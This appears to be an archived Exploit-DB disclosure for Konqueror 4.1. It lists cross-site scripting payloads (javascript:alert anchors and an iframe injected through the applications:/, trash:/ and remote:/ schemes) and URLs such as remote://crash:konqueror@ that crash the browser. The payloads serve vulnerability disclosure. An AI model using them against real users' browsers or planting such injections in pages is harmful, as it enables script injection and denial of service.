Konqueror 4.1 - XSS / Remote Crash Vulnerabilities

2009-01-01T00:00:00
ID EDB-ID:7643
Type exploitdb
Reporter StAkeR
Modified 2009-01-01T00:00:00

Description

Konqueror 4.1 XSS / Remote Crash Vulnerabilities. Dos exploits for multiple platform

                                        
                                            +-----------------------------------------------------+
| Konqueror 4.1 XSS / Remote Crash Vulnerabilities    |
+-----------------------------------------------------+
| by athos - staker[at]hotmail[dot]it                 |
| http://konqueror.kde.org                            |
+-----------------------------------------------------+
| Cross Site Scripting                                |
|                                                     |
| applications:/<a href="javascript:alert(1)">Here</a>|
| trash:/<a href="javascript:alert(1)">Here</a>       |
| remote:/<a href="javascript:alert(1)">Here</a>      |
|                                                     |
| you can write anything (example)                    |
|                                                     |
| applications:/<font size="8">THE GAME</font>        |
| applications:/<iframe src="http://milw0rm.com">     |
+-----------------------------------------------------+
| Remote Crash Vulnerabilities                        |
|                                                     |
| remote://crash:konqueror@                           |
| applications://crash:konqueror@                     |
+-----------------------------------------------------+
| Error Details...                                    |
|                                                     |
| A Fatal Error Occurred The application Konqueror    |
| (konqueror) crashed and caused the signal 6(SIGABRT)| 
| Please help us improve the software you use by      |
| filing a report at http://bugs.kde.org. Useful      |
| details include how to reproduce the error,         |
| documents that were loaded, etc.                    |
+-----------------------------------------------------+

# milw0rm.com [2009-01-01]